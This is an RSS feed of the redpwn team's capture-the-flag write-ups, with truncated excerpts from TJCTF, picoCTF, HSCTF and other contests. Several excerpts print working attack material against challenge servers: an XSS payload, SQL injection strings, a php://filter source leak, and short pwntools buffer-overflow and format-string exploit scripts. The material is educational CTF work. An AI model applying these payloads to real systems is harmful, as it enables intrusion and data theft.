<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>Home on redpwn</title>
    <link>https://redpwn.net/</link>
    <description>Recent content in Home on redpwn</description>
    <generator>Hugo -- gohugo.io</generator>
    <language>en-us</language>
    <lastBuildDate>Thu, 28 May 2020 00:00:00 +0000</lastBuildDate><atom:link href="https://redpwn.net/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>Cookie Monster</title>
      <link>https://redpwn.net/writeups/tjctf2020/cookiemonster/</link>
      <pubDate>Thu, 28 May 2020 00:00:00 +0000</pubDate>
      
      <guid>https://redpwn.net/writeups/tjctf2020/cookiemonster/</guid>
      <description>TJCTF 2020 - Cookie Monster The flag existed in two parts in a massive 1 GB memory dump.
The challenge was honestly pretty cool. We had a ton of fun solving it. It was only slightly stressful because we knew b1c was on our tail.
Contrary to what you might think, Cookie Monster wasn’t very challenging. redpwn—in all of its creativity—came up with an even more fun challenge on top of Cookie Monster for itself.</description>
    </item>
    
    <item>
      <title>fb library</title>
      <link>https://redpwn.net/writeups/tjctf2020/fblibrary/</link>
      <pubDate>Thu, 28 May 2020 00:00:00 +0000</pubDate>
      
      <guid>https://redpwn.net/writeups/tjctf2020/fblibrary/</guid>
      <description>TJCTF 2020 - fb library The fb library challenge&amp;rsquo;s application is vulnerable to reflected XSS through search queries at https://fb_library.tjctf.org/search?q={xss}. However, the payload has an 18 byte restriction on it as the application truncates queries longer than 18 bytes and appends ... to them before writing to the page.
So, as window.name is attacker-controlled, we came up with &amp;lt;script&amp;gt;eval(name)/* as the payload. Thankfully, the CSP whitelisted eval.
All we did was simply create the following page to create an exploit page containing something along the lines of:</description>
    </item>
    
    <item>
      <title>Home Rolled</title>
      <link>https://redpwn.net/writeups/tjctf2020/homerolled/</link>
      <pubDate>Thu, 28 May 2020 00:00:00 +0000</pubDate>
      
      <guid>https://redpwn.net/writeups/tjctf2020/homerolled/</guid>
      <description>TJCTF 2020 - Home Rolled Problem It&amp;rsquo;s that time of year again&amp;hellip; time to home roll your own crypto! Since pesky CTF players keep breaking my schemes, this time I obfuscated the source code, so you&amp;rsquo;ll never be able to figure out what it&amp;rsquo;s doing. I also used cutting-edge Python 3.8 syntax! Security by obscurity!
nc p1.tjctf.org 8012
Solution The source is given in this challenge; unfortunately, it is a bit obfuscated:</description>
    </item>
    
    <item>
      <title>Jarvis</title>
      <link>https://redpwn.net/writeups/tjctf2020/jarvis/</link>
      <pubDate>Thu, 28 May 2020 00:00:00 +0000</pubDate>
      
      <guid>https://redpwn.net/writeups/tjctf2020/jarvis/</guid>
      <description>TJCTF 2020 - Jarvis Looking at the files we are given, we realized that the challenge is a binary classification task. A simple search reveals this script which we adapted to the help.csv dataset.
from numpy import loadtxt
import tensorflow as tf
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense
help_dataset = loadtxt(&amp;#34;help.csv&amp;#34;, delimiter=&amp;#34;,&amp;#34;)
x = help_dataset[:, 1:10]
y = help_dataset[:, 0]
model = Sequential()
model.add(Dense(12, input_dim=9, activation=&amp;#34;relu&amp;#34;))
model.add(Dense(8, activation=&amp;#34;relu&amp;#34;))
model.</description>
    </item>
    
    <item>
      <title>the Hacker One</title>
      <link>https://redpwn.net/writeups/dawgctf2020/thehackerone/</link>
      <pubDate>Mon, 13 Apr 2020 00:00:00 +0000</pubDate>
      
      <guid>https://redpwn.net/writeups/dawgctf2020/thehackerone/</guid>
      <description>DawgCTF - the Hacker One - Writeup The Hacker One was a web / networking challenge in DawgCTF worth 500 points. It was written by a sponsor, HackerOne.
Initial Reconnaissance First, as the challenge is supposed to be modelled after a bug bounty program, and as bug bounty hunting typically requires a great deal of reconnaissance, we began by port scanning umbc.h1ctf.com.
nmap umbc.h1ctf.com
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-13 20:35 PDT
Nmap scan report for umbc.</description>
    </item>
    
    <item>
      <title>B1g_Mac</title>
      <link>https://redpwn.net/writeups/picoctf2019/b1g_mac/</link>
      <pubDate>Tue, 22 Oct 2019 00:00:00 +0000</pubDate>
      
      <guid>https://redpwn.net/writeups/picoctf2019/b1g_mac/</guid>
      <description>B1g_Mac - 500 points Description Here&amp;rsquo;s a zip file. You can also find the file in /problems/b1g-mac_0_ac4b0dbedcd3b0f0097a5f056e04f97a.
Flag picoCTF{M4cTim35!} Solution Upon reversing the binary, I noticed a function called _decode that is never called. To have the challenge solve itself all I needed to do was have this function be called in a debugger.
I opened main.exe in x32dbg and set a breakpoint at 0x401B5E, the address of call _listdir (the &amp;ldquo;encode&amp;rdquo; function).</description>
    </item>
    
    <item>
      <title>cereal-hacker-2</title>
      <link>https://redpwn.net/writeups/picoctf2019/cereal-hacker-2/</link>
      <pubDate>Tue, 22 Oct 2019 00:00:00 +0000</pubDate>
      
      <guid>https://redpwn.net/writeups/picoctf2019/cereal-hacker-2/</guid>
      <description>cereal hacker 2 - 500 points Description Get the admin&amp;rsquo;s password. https://2019shell1.picoctf.com/problem/62195/ or http://2019shell1.picoctf.com:62195
Solution Using php filters, we can leak the source code.
http://2019shell1.picoctf.com:62195/?file=php://filter/convert.base64-encode/resource=admin
&amp;lt;?php
require_once(&amp;#39;cookie.php&amp;#39;);
if(isset($perm) &amp;amp;&amp;amp; $perm-&amp;gt;is_admin()){
...
This has a reference to cookie.php.
http://2019shell1.picoctf.com:62195/?file=php://filter/convert.base64-encode/resource=cookie
&amp;lt;?php
require_once(&amp;#39;../sql_connect.php&amp;#39;);
// I got tired of my php sessions expiring, so I just put all my useful information in a serialized cookie
...
This has a reference to sql_connect.php which looks interesting.</description>
    </item>
    
    <item>
      <title>Client-side-again</title>
      <link>https://redpwn.net/writeups/picoctf2019/client-side-again/</link>
      <pubDate>Tue, 22 Oct 2019 00:00:00 +0000</pubDate>
      
      <guid>https://redpwn.net/writeups/picoctf2019/client-side-again/</guid>
      <description>Client-side-again - 200 points Description Can you break into this super secure portal? https://2019shell1.picoctf.com/problem/12278/ (link) or http://2019shell1.picoctf.com:12278
Flag picoCTF{not_this_again_40a0d8} Solution Looking at the page at https://2019shell1.picoctf.com/problem/12278/ we see the following JavaScript code to validate passwords/flags:
var _0x5a46=[&amp;#39;0a0d8}&amp;#39;,&amp;#39;_again_4&amp;#39;,&amp;#39;this&amp;#39;,&amp;#39;Password\x20Verified&amp;#39;,&amp;#39;Incorrect\x20password&amp;#39;,&amp;#39;getElementById&amp;#39;,&amp;#39;value&amp;#39;,&amp;#39;substring&amp;#39;,&amp;#39;picoCTF{&amp;#39;,&amp;#39;not_this&amp;#39;];(function(_0x4bd822,_0x2bd6f7){var _0xb4bdb3=function(_0x1d68f6){while(--_0x1d68f6){_0x4bd822[&amp;#39;push&amp;#39;](_0x4bd822[&amp;#39;shift&amp;#39;]());}};_0xb4bdb3(++_0x2bd6f7);}(_0x5a46,0x1b3));var _0x4b5b=function(_0x2d8f05,_0x4b81bb){_0x2d8f05=_0x2d8f05-0x0;var _0x4d74cb=_0x5a46[_0x2d8f05];return _0x4d74cb;};function verify(){checkpass=document[_0x4b5b(&amp;#39;0x0&amp;#39;)](&amp;#39;pass&amp;#39;)[_0x4b5b(&amp;#39;0x1&amp;#39;)];split=0x4;if(checkpass[_0x4b5b(&amp;#39;0x2&amp;#39;)](0x0,split*0x2)==_0x4b5b(&amp;#39;0x3&amp;#39;)){if(checkpass[_0x4b5b(&amp;#39;0x2&amp;#39;)](0x7,0x9)==&amp;#39;{n&amp;#39;){if(checkpass[_0x4b5b(&amp;#39;0x2&amp;#39;)](split*0x2,split*0x2*0x2)==_0x4b5b(&amp;#39;0x4&amp;#39;)){if(checkpass[_0x4b5b(&amp;#39;0x2&amp;#39;)](0x3,0x6)==&amp;#39;oCT&amp;#39;){if(checkpass[_0x4b5b(&amp;#39;0x2&amp;#39;)](split*0x3*0x2,split*0x4*0x2)==_0x4b5b(&amp;#39;0x5&amp;#39;)){if(checkpass[&amp;#39;substring&amp;#39;](0x6,0xb)==&amp;#39;F{not&amp;#39;){if(checkpass[_0x4b5b(&amp;#39;0x2&amp;#39;)](split*0x2*0x2,split*0x3*0x2)==_0x4b5b(&amp;#39;0x6&amp;#39;)){if(checkpass[_0x4b5b(&amp;#39;0x2&amp;#39;)](0xc,0x10)==_0x4b5b(&amp;#39;0x7&amp;#39;)){alert(_0x4b5b(&amp;#39;0x8&amp;#39;));}}}}}}}}else{alert(_0x4b5b(&amp;#39;0x9&amp;#39;));}} The first thing I did was pull up http://www.jsnice.org/:
&amp;#39;use strict&amp;#39;;
/** @type {!Array} */
var _0x5a46 = [&amp;#34;0a0d8}&amp;#34;, &amp;#34;_again_4&amp;#34;, &amp;#34;this&amp;#34;, &amp;#34;Password Verified&amp;#34;, &amp;#34;Incorrect password&amp;#34;, &amp;#34;getElementById&amp;#34;, &amp;#34;value&amp;#34;, &amp;#34;substring&amp;#34;, &amp;#34;picoCTF{&amp;#34;, &amp;#34;not_this&amp;#34;];
(function(data, i) {
  /**
   * @param {number} isLE
   * @return {undefined}
   */
  var write = function(isLE) {
    for (; --isLE;) {
      data[&amp;#34;push&amp;#34;](data[&amp;#34;shift&amp;#34;]());
    }
  };
  write(++i);
})(_0x5a46, 435);
/**
 * @param {string} level
 * @param {?</description>
    </item>
    
    <item>
      <title>Empire1</title>
      <link>https://redpwn.net/writeups/picoctf2019/empire1/</link>
      <pubDate>Tue, 22 Oct 2019 00:00:00 +0000</pubDate>
      
      <guid>https://redpwn.net/writeups/picoctf2019/empire1/</guid>
      <description>Empire1 - 400 points Description Psst, Agent 513, now that you&amp;rsquo;re an employee of Evil Empire Co., try to get their secrets off the company website. https://2019shell1.picoctf.com/problem/4155/ (link) Can you first find the secret code they assigned to you? or http://2019shell1.picoctf.com:4155
Flag picoCTF{wh00t_it_a_sql_inject29944a88} Solution The SQL injection vulnerability through the Todo titles is fairly obvious. A simple &#39; is enough to cause an SQL syntax error.
Our winning payload was:</description>
    </item>
    
    <item>
      <title>Empire2</title>
      <link>https://redpwn.net/writeups/picoctf2019/empire2/</link>
      <pubDate>Tue, 22 Oct 2019 00:00:00 +0000</pubDate>
      
      <guid>https://redpwn.net/writeups/picoctf2019/empire2/</guid>
      <description>Empire2 - 450 points Description Well done, Agent 513! Our sources say Evil Empire Co is passing secrets around when you log in: https://2019shell1.picoctf.com/problem/6362/ (link), can you help us find it? or http://2019shell1.picoctf.com:6362
Flag picoCTF{its_a_me_your_flag6426d097} Solution The first thing I did was to test for SQL injection. It didn&amp;rsquo;t look like this was vulnerable. There were users named things that looked like SSTI payloads, so the next thing I tried was also SSTI through the card name.</description>
    </item>
    
    <item>
      <title>Empire3</title>
      <link>https://redpwn.net/writeups/picoctf2019/empire3/</link>
      <pubDate>Tue, 22 Oct 2019 00:00:00 +0000</pubDate>
      
      <guid>https://redpwn.net/writeups/picoctf2019/empire3/</guid>
      <description>Empire3 - 500 points Description Agent 513! One of your dastardly colleagues is laughing very sinisterly! Can you access his todo list and discover his nefarious plans? https://2019shell1.picoctf.com/problem/32252/ (link) or http://2019shell1.picoctf.com:32252
Flag picoCTF{cookies_are_a_sometimes_food_dd5a4e43} Solution Empire2 had gone by pretty quickly. At this point, I just wanted to confirm to myself that they followed the pattern of the other two Empire challenges and had used a new vulnerability in the cards/todo titles.</description>
    </item>
    
    <item>
      <title>ghost_diary</title>
      <link>https://redpwn.net/writeups/picoctf2019/ghost_diary/</link>
      <pubDate>Tue, 22 Oct 2019 00:00:00 +0000</pubDate>
      
      <guid>https://redpwn.net/writeups/picoctf2019/ghost_diary/</guid>
      <description>Ghost_Diary - 500 points Flag picoCTF{nu11_byt3_Gh05T_41a29ece} Analysis
$ ldd ghostdiary
        linux-vdso.so.1 (0x00007ffcabdd4000)
        libc.so.6 =&amp;gt; /lib/x86_64-linux-gnu/libc.so.6 (0x00007ff81dd18000)
        /lib64/ld-linux-x86-64.so.2 (0x00007ff81e30c000)
$ strings /lib/x86_64-linux-gnu/libc.so.6 | grep GNU
GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1) stable release version 2.27.
Compiled by GNU CC version 7.3.0.
$ checksec ghostdiary
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
The libc version is 2.27, which implies the use of tcache with very few security checks.</description>
    </item>
    
    <item>
      <title>investigation_encoded_2</title>
      <link>https://redpwn.net/writeups/picoctf2019/investigation_encoded_2/</link>
      <pubDate>Tue, 22 Oct 2019 00:00:00 +0000</pubDate>
      
      <guid>https://redpwn.net/writeups/picoctf2019/investigation_encoded_2/</guid>
      <description>investigation_encoded_2 - 500 points Description We have recovered a binary and 1 file: image01. See what you can make of it. It&amp;rsquo;s also found in /problems/investigation-encoded-2_0_bf594e1542e760d4c72cc1401d71b3eb on the shell server. NOTE: The flag is not in the normal picoCTF{XXX} format.
Flag t1m3f1i35000000000003d746a40 Solution This challenge is similar to investigation_encoded_1, except there is a login function that prevents the binary from executing the encode function. We patch the binary so we can bypass the call to the login function, then do the same approach as investigation_encoded_1: brute force flag until it matches for every possible character with a script.</description>
    </item>
    
    <item>
      <title>Irish-Name-Repo-2</title>
      <link>https://redpwn.net/writeups/picoctf2019/irish-name-repo-2/</link>
      <pubDate>Tue, 22 Oct 2019 00:00:00 +0000</pubDate>
      
      <guid>https://redpwn.net/writeups/picoctf2019/irish-name-repo-2/</guid>
      <description>Irish-Name-Repo 2 - 350 points Description There is a website running at https://2019shell1.picoctf.com/problem/58043/ (link). Someone has bypassed the login before, and now it&amp;rsquo;s being strengthened. Try to see if you can still login! or http://2019shell1.picoctf.com:58043
Flag picoCTF{m0R3_SQL_plz_c9c1c726} Solution Okay, so we already know that the vulnerability is SQL injection from the last challenge. We try to inject simple payloads like &#39; OR 1=1 -- but there seems to be some kind of filter in place.</description>
    </item>
    
    <item>
      <title>Irish-Name-Repo-3</title>
      <link>https://redpwn.net/writeups/picoctf2019/irish-name-repo-3/</link>
      <pubDate>Tue, 22 Oct 2019 00:00:00 +0000</pubDate>
      
      <guid>https://redpwn.net/writeups/picoctf2019/irish-name-repo-3/</guid>
      <description>Irish-Name-Repo 3 - 400 points Description There is a secure website running at https://2019shell1.picoctf.com/problem/4161/ (link) or http://2019shell1.picoctf.com:4161. Try to see if you can login as admin!
Flag picoCTF{3v3n_m0r3_SQL_d490b67d} Solution The last challenge was SQL injection so it was safe to assume that this one would be too.
The first thing I did was try another simple payload like &#39; OR 1=1--. Unfortunately, it gave an HTTP 500 error.
At that point I realized in the HTTP POST request that it was sending a body parameter debug that was set to 0.</description>
    </item>
    
    <item>
      <title>Java_Script_Kiddie_2</title>
      <link>https://redpwn.net/writeups/picoctf2019/java_script_kiddie_2/</link>
      <pubDate>Tue, 22 Oct 2019 00:00:00 +0000</pubDate>
      
      <guid>https://redpwn.net/writeups/picoctf2019/java_script_kiddie_2/</guid>
      <description>Java Script Kiddie 2 - 450 points Description The image link appears broken&amp;hellip; twice as badly&amp;hellip; https://2019shell1.picoctf.com/problem/32262 or http://2019shell1.picoctf.com:32262
Flag picoCTF{f1ee7ff44419a675d1a0f0a1a91dff4c} Solution This challenge is similar to Java Script Kiddie 1, except the code changed a bit:
var bytes = [];
$.get(&amp;quot;bytes&amp;quot;, function(resp) {
  bytes = Array.from(resp.split(&amp;quot; &amp;quot;), x =&amp;gt; Number(x));
});
function assemble_png(u_in){
  var LEN = 16;
  var key = &amp;quot;00000000000000000000000000000000&amp;quot;;
  var shifter;
  if(u_in.length == key.length){
    key = u_in;
  }
  var result = [];
  for(var i = 0; i &amp;lt; LEN; i++){
    shifter = Number(key.</description>
    </item>
    
    <item>
      <title>shark-on-wire-2</title>
      <link>https://redpwn.net/writeups/picoctf2019/shark-on-wire-2/</link>
      <pubDate>Tue, 22 Oct 2019 00:00:00 +0000</pubDate>
      
      <guid>https://redpwn.net/writeups/picoctf2019/shark-on-wire-2/</guid>
      <description>shark on the wire 2 - 300 points Description We found this packet capture. Recover the flag that was pilfered from the network. You can also find the file in /problems/shark-on-wire-2_0_3e92bfbdb2f6d0e25b8d019453fdbf07.
Flag picoCTF{p1LLf3r3d_data_v1a_st3g0} Solution Since this is another packet capture challenge, I popped open Wireshark and looked around for a bit. Eventually I stumbled upon some weird looking traffic and wrote a filter to separate it from the rest:
udp &amp;amp;&amp;amp; ip.</description>
    </item>
    
    <item>
      <title>sice_cream</title>
      <link>https://redpwn.net/writeups/picoctf2019/sice_cream/</link>
      <pubDate>Tue, 22 Oct 2019 00:00:00 +0000</pubDate>
      
      <guid>https://redpwn.net/writeups/picoctf2019/sice_cream/</guid>
      <description>sice_cream - 500 points Flag flag{th3_r3al_questi0n_is_why_1s_libc_2.23_still_4_th1ng_62167e9e} Analysis
$ strings libc.so.6 | grep GNU
GNU C Library (Ubuntu GLIBC 2.23-0ubuntu11) stable release version 2.23, by Roland McGrath et al.
Compiled by GNU CC version 5.4.0 20160609.
GNU Libidn by Simon Josefsson
$ checksec sice_cream
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
RUNPATH: &amp;#39;./&amp;#39;
The libc version is 2.23, meaning that tcache has not been implemented yet.</description>
    </item>
    
    <item>
      <title>zero_to_hero</title>
      <link>https://redpwn.net/writeups/picoctf2019/zero_to_hero/</link>
      <pubDate>Tue, 22 Oct 2019 00:00:00 +0000</pubDate>
      
      <guid>https://redpwn.net/writeups/picoctf2019/zero_to_hero/</guid>
      <description>zero to hero Category: Binary Exploitation
Points: 500
Description: Now you&amp;rsquo;re really cooking. Can you pwn this service? Connect with nc 2019shell1.picoctf.com 49928. libc.so.6 ld-2.29.so
 We are given the libc base address, so no leaks are needed. All we have to do is get a write.
The issue is that the binary uses libc 2.29, which patches the double free vulnerability (or does it? :o).
Googling common exploits in libc 2.</description>
    </item>
    
    <item>
      <title>LambDash 3</title>
      <link>https://redpwn.net/writeups/picoctf2018/lambdash3/</link>
      <pubDate>Sun, 14 Oct 2018 00:00:00 +0000</pubDate>
      
      <guid>https://redpwn.net/writeups/picoctf2018/lambdash3/</guid>
      <description>Final payload payload
Points 800
Description  C? Who uses that anymore. If we really want to be secure, we should all start learning lambda calculus. http://2018shell1.picoctf.com:43607 (link)
 Hints  This compiler is 99.9% bug free! I&amp;rsquo;m sure the other 0.1% won&amp;rsquo;t amount to anything&amp;hellip;
 Solution The website linked contains information about a new language called LambDash. To access a tutorial page, we GET /?page=client/pages/..., from which we can infer that GETing /?</description>
    </item>
    
    <item>
      <title>be-quick-or-be-dead-3</title>
      <link>https://redpwn.net/writeups/picoctf2018/be-quick-or-be-dead-3/</link>
      <pubDate>Fri, 12 Oct 2018 00:00:00 +0000</pubDate>
      
      <guid>https://redpwn.net/writeups/picoctf2018/be-quick-or-be-dead-3/</guid>
      <description>Problem files be-quick-or-be-dead-3
Solve script solve.py
Points 350
Description  As the song draws closer to the end, another executable be-quick-or-be-dead-3 suddenly pops up. This one requires even faster machines. Can you run it fast enough too? You can also find the executable in /problems/be-quick-or-be-dead-3_2_fc35b1f6832df902b8e2f724772d012f.
 Hints  How do you speed up a very repetitive computation?
 How2solve We are given a binary. Running produces the following output.
$ .</description>
    </item>
    
    <item>
      <title>circuit123</title>
      <link>https://redpwn.net/writeups/picoctf2018/circuit123/</link>
      <pubDate>Fri, 12 Oct 2018 00:00:00 +0000</pubDate>
      
      <guid>https://redpwn.net/writeups/picoctf2018/circuit123/</guid>
      <description>Problem files map1.txt map2.txt decrypt.py
Solve script keygen.py
Points 800
Description  Can you crack the key to decrypt map2 for us? The key to map1 is 11443513758266689915.
 Hints  Have you heard of z3?
 How to solve The decrypt.py script takes as input an integer key and a map file. The code does some bizarre operation in verify() to determine if the key is correct, and then decrypts the key to a string.</description>
    </item>
    
    <item>
      <title>Dog or Frog</title>
      <link>https://redpwn.net/writeups/picoctf2018/dogorfrog/</link>
      <pubDate>Fri, 12 Oct 2018 00:00:00 +0000</pubDate>
      
      <guid>https://redpwn.net/writeups/picoctf2018/dogorfrog/</guid>
      <description>Points 900
Description This is a classic machine learning problem. Thankfully, I&amp;rsquo;ve done a bit of machine learning already.
We came across this article and copied much of the template code from there. I wrote my code in a Jupyter notebook.
The only problem that I encountered was that of the learning rate. The example&amp;rsquo;s learning rate was way too small, and resulted in no progress. In order to solve, I set the learning rate to 1e7 and decayed it by 0.</description>
    </item>
    
    <item>
      <title>James Brahm Returns</title>
      <link>https://redpwn.net/writeups/picoctf2018/jbr/</link>
      <pubDate>Fri, 12 Oct 2018 00:00:00 +0000</pubDate>
      
      <guid>https://redpwn.net/writeups/picoctf2018/jbr/</guid>
      <description>Points 700
Problem Statement Dr. Xernon has finally approved an update to James Brahm&amp;rsquo;s spy terminal. (Someone finally told them that ECB isn&amp;rsquo;t secure.) Fortunately, CBC mode is safe! Right? Connect with nc 2018shell1.picoctf.com 22666. source
Hint: What killed SSL3?
Research Googling the hint, we come across the POODLE attack. Apparently, this problem uses a weak form of encryption (AES CBC) that we can exploit to get the flag. However, there wasn&amp;rsquo;t good literature on exactly how to implement this attack.</description>
    </item>
    
    <item>
      <title>Hard Shells</title>
      <link>https://redpwn.net/writeups/icectf2018/hard_shells/</link>
      <pubDate>Wed, 12 Sep 2018 00:00:00 +0000</pubDate>
      
      <guid>https://redpwn.net/writeups/icectf2018/hard_shells/</guid>
      <description>Points 200
Description  After a recent hack, a laptop was seized and subsequently analyzed. The victim of the hack? An innocent Mexican restaurant. During the investigation they found this suspicious file. Can you find any evidence that the owner of this laptop is the culprit?
 Solve
$ file hardshells
hardshells: Zip archive data, at least v1.0 to extract
$ mv hardshells hardshells.zip
renamed &#39;hardshells&#39; -&amp;gt; &#39;hardshells.zip&#39;
Apparently the zip file has a password.</description>
    </item>
    
    <item>
      <title>Twitter</title>
      <link>https://redpwn.net/writeups/icectf2018/twitter/</link>
      <pubDate>Wed, 12 Sep 2018 00:00:00 +0000</pubDate>
      
      <guid>https://redpwn.net/writeups/icectf2018/twitter/</guid>
      <description>Problem files twitter_binary libc.so.6
Solve script solve.py
Points 800
Description  Someone left a time machine in the basement with classic games from the 1970s. Let me play these on the job, nothing can go wrong.
 Remarks This was hard.
Difficulty Hard
Initial experimentation We are given a binary to download and an ssh connection containing the binary and a collection of .ROM files. There is no flag.txt file, making the challenge goal a bit unclear.</description>
    </item>
    
    <item>
      <title>Alarm</title>
      <link>https://redpwn.net/writeups/hsctf2018/alarm/</link>
      <pubDate>Wed, 29 Aug 2018 00:00:00 +0000</pubDate>
      
      <guid>https://redpwn.net/writeups/hsctf2018/alarm/</guid>
      <description>Solve script solve.py
from pwn import *
e = ELF(&#39;alarm&#39;)
what_addr = e.symbols[&#39;what&#39;] # Function that gives flag
loop_addr = e.symbols[&#39;loop&#39;] # Mainloop
#p = process(&#39;./alarm&#39;)
p = remote(&#39;shell.hsctf.com&#39;, 10004)
# STAGE 1
# Create alarm to leak offset of symbols. We need to do this because this is a
# PIE (Position Independent Executable), meaning that all the addresses will be
# offset by an unknown amount. The program actually attempts to recognize format
# string payloads, which is the reason for the # symbol.</description>
    </item>
    
    <item>
      <title>The Abyss</title>
      <link>https://redpwn.net/writeups/tjctf2018/abyss/</link>
      <pubDate>Wed, 29 Aug 2018 00:00:00 +0000</pubDate>
      
      <guid>https://redpwn.net/writeups/tjctf2018/abyss/</guid>
      <description>Written by nthistle
Problem Statement If you stare into the abyss, the abyss stares back.
nc problem1.tjctf.org 8006
Observations The first observation is that this is a Python environment.
However, further experimentation reveals that all our errors are eaten up with a cute message.
&amp;gt;&amp;gt;&amp;gt; blahblop
The Abyss consumed your error.
Furthermore, some words seem to be banned.
&amp;gt;&amp;gt;&amp;gt; ().__class__
Sorry, &#39;__class__&#39; is not allowed.
&amp;gt;&amp;gt;&amp;gt; lol__class__lol
Sorry, &#39;__class__&#39; is not allowed.</description>
    </item>
    
    <item>
      <title>Caesar</title>
      <link>https://redpwn.net/writeups/hsctf2018/caesar/</link>
      <pubDate>Mon, 27 Aug 2018 00:00:00 +0000</pubDate>
      
      <guid>https://redpwn.net/writeups/hsctf2018/caesar/</guid>
      <description>Source caesar.c
Solve script solve.py
from pwn import *
e = ELF(&#39;caesar&#39;)
give_flag_addr = e.symbols[&#39;give_flag&#39;]
give_flag_addr = 0x8048886 # idk why I need to do this, but this is the address in gdb
# Address of puts in the global offset table
# We need this because this will be overwritten with the address of give_flag
puts_addr = e.got[&#39;puts&#39;]
p = remote(&amp;quot;shell.hsctf.com&amp;quot;, 10003)
#p = process(&#39;./caesar&#39;)
print p.recvuntil(&#39;Enter text to be encoded: &#39;)
# Use pwntools to construct format string payload that writes give_flag_addr
# to puts_addr
writes = { puts_addr: give_flag_addr }
# The 31 here is the distance to the buffer from the top of the stack where
# the format string is stored when the printf is called.</description>
    </item>
    
    <item>
      <title>CMU Binary Bomb</title>
      <link>https://redpwn.net/writeups/crackmes/cmu_binary_bomb/</link>
      <pubDate>Mon, 27 Aug 2018 00:00:00 +0000</pubDate>
      
      <guid>https://redpwn.net/writeups/crackmes/cmu_binary_bomb/</guid>
      <description>Binary bomb
Reversed source code bomb.c
FILE *infile;
int num_input_strings = 0;
char input_strings[...][80];

void initialize_bomb(void) {
    signal(SIGINT, sig_handler);
}

void sig_handler(void) {
    printf(&amp;quot;So you think you can stop the bomb with ctrl-c, do you?\n&amp;quot;);
    sleep(3);
    printf(&amp;quot;Well...&amp;quot;);
    fflush(stdout);
    sleep(1);
    printf(&amp;quot;OK. :-)\n&amp;quot;);
    exit(16);
}

// Returns whether a string has only space characters
int blank_line(char *input) {
    if (input[0] == &#39;\0&#39;) {
        return 1;
    }
    for (;;) {
        int c = *input;
        input++;
        if (isspace(c)) {
            if (*input == &#39;\0&#39;) {
                return 1;
            }
        } else {
            return 0;
        }
    }
}

// Can return NULL
char *skip(void) {
    do {
        char *input_string = input_strings[num_input_strings];
        char *input = fgets(input_string, 80, infile);
        if (input == NULL) {
            break;
        }
    } while (blank_line(input));
    return input;
}

void explode_bomb(void) {
    printf(&amp;quot;\nBOOM!</description>
    </item>
    
    <item>
      <title>Jumper</title>
      <link>https://redpwn.net/writeups/hsctf2018/jumper/</link>
      <pubDate>Mon, 27 Aug 2018 00:00:00 +0000</pubDate>
      
      <guid>https://redpwn.net/writeups/hsctf2018/jumper/</guid>
      <description>Source jumper.c
Solve script solve.py
from pwn import *
e = ELF(&#39;jumper&#39;)
loladdr = p32(e.symbols[&#39;lol&#39;])
p = remote(&amp;quot;shell.hsctf.com&amp;quot;, 10001)
#p = process(&#39;./jumper&#39;)
print p.recvuntil(&#39;: &#39;)
p.send(&#39;A&#39; * (0x28 + 4) + loladdr)
p.interactive()</description>
    </item>
    
    <item>
      <title>Review</title>
      <link>https://redpwn.net/writeups/hsctf2018/review/</link>
      <pubDate>Mon, 27 Aug 2018 00:00:00 +0000</pubDate>
      
      <guid>https://redpwn.net/writeups/hsctf2018/review/</guid>
      <description>Source review.c
Solve script solve.py
from pwn import *
p = remote(&amp;quot;shell.hsctf.com&amp;quot;, 10000)
p.recvuntil(&amp;quot;What was the name of the last movie you watched?\n&amp;quot;)
p.send(&#39;A&#39; * 33)</description>
    </item>
    
    <item>
      <title>RPI Binary Bomb</title>
      <link>https://redpwn.net/writeups/crackmes/rpi_binary_bomb/</link>
      <pubDate>Mon, 27 Aug 2018 00:00:00 +0000</pubDate>
      
      <guid>https://redpwn.net/writeups/crackmes/rpi_binary_bomb/</guid>
      <description>Binary bomb
Reversed source code bomb.c
// Functions that are not relevant to defusing the bomb are marked &amp;quot;STUB&amp;quot;
static void libc_start_main(void *arg) {
    // STUB
}

static void disarm_handler(void) {
    // STUB
}

// Setting all wires to 0 defuses the bomb
static int wire_yellow = 1;
static int wire_green = 1;
static int wire_blue = 1;
static int wire_red = 1;

/*
 * This function gets the amount of time left to display in timer.</description>
    </item>
    
    <item>
      <title>Tiebreaker</title>
      <link>https://redpwn.net/writeups/pactf2018/tiebreakers/</link>
      <pubDate>Mon, 27 Aug 2018 00:00:00 +0000</pubDate>
      
      <guid>https://redpwn.net/writeups/pactf2018/tiebreakers/</guid>
      <description>Solve script solve.py
Writeup We are given a server, and our task is to make the server respond to an HTTP GET request with our team name, &amp;ldquo;meephackerz&amp;rdquo;.
After a bit of testing, we recognize that the server runs in python2, and anything we submit is eval&amp;rsquo;d twice, with the setback that no alphanumeric characters are allowed.
Python2 lets us represent arbitrary characters as &amp;quot;%c&amp;quot; % &amp;lt;num&amp;gt;. We now must simply represent &#39;c&#39; and any arbitrary integer using non alphanumeric characters.</description>
    </item>
    
    <item>
      <title>Tiles</title>
      <link>https://redpwn.net/writeups/hsctf2018/tiles/</link>
      <pubDate>Mon, 27 Aug 2018 00:00:00 +0000</pubDate>
      
      <guid>https://redpwn.net/writeups/hsctf2018/tiles/</guid>
      <description>Solve script tiles.c
#include &amp;lt;stdio.h&amp;gt;
#define M 5000
#define N 5000
#define BIGPRIME 1000000007
#define exists(a,b) ((0&amp;lt;=(a))&amp;amp;&amp;amp;((a)&amp;lt;M)&amp;amp;&amp;amp;(0&amp;lt;=(b))&amp;amp;&amp;amp;((b)&amp;lt;N))

int main() {
    static int park[M][N], ways[M][N];
    int i, j;
    FILE *tf = fopen(&amp;quot;tiles.txt&amp;quot;, &amp;quot;r&amp;quot;);
    for (i = 0; i &amp;lt; M; ++i)
        for (j = 0; j &amp;lt; N; ++j)
            fscanf(tf, &amp;quot;%d&amp;quot;, &amp;amp;park[i][j]);
    puts(&amp;quot;Done scanning tiles.txt...&amp;quot;);
    ways[M-1][0] = 1;
    for (i = 0; i &amp;lt; M + N; ++i) {
        for (j = 0; j &amp;lt; N; ++j) {
            if (exists(M-1-(i-j), j)) {
